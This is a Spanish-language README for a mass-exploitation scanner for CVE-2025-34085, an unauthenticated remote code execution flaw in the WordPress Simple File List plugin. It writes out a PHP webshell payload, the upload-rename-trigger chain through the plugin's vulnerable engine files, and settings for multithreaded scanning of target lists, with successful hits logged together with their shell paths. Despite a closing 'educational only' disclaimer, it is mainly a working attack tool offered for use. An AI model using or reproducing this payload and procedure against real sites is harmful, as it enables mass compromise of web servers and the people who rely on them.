Escáner RCE no autenticado multiobjetivo para CVE-2025-34085 que afecta al plugin WordPress Simple File List. Sube, renombra y desencadena webshells PHP en grandes conjuntos de objetivos.
Escáner de explotación masiva para CVE-2025-34085 — una vulnerabilidad de ejecución remota de código no autenticada en el plugin Simple File List de WordPress.
Esta herramienta sube un payload PHP disfrazado como imagen, lo renombra mediante un motor de archivos vulnerable y activa la ejecución de shell con un comando personalizado. Soporta escaneo multihilo en grandes conjuntos de objetivos.
targets.txt)vuln.txtpython3 CVE-2025-34085.py
Los objetivos deben listarse en targets.txt:
example.com
http://target2.com
https://target3.com
Edita los siguientes valores en el script según sea necesario:
COMMAND = "id" # Shell command to execute
EXPECTED_SUBSTRING = "uid=" # String to verify successful command execution
THREADS = 20 # Number of concurrent threads
Sube un archivo .png falso que contiene <?php system($_GET['cmd']); ?> a través del vulnerable ee-upload-engine.php.
Lo renombra a .php, .phtml, etc. usando ee-file-engine.php.
Envía una solicitud GET para activar el shell con cmd=id.
Verifica el éxito basándose en la subcadena de salida esperada.
Los aciertos exitosos se guardan en:
vuln.txt
Cada línea incluye la URL vulnerable, la ruta del shell y la salida del comando.
wp-content/uploads/ escribibleEsta herramienta es solo para fines educativos y pruebas autorizadas. Úsala bajo tu propio riesgo. El acceso no autorizado a sistemas es ilegal.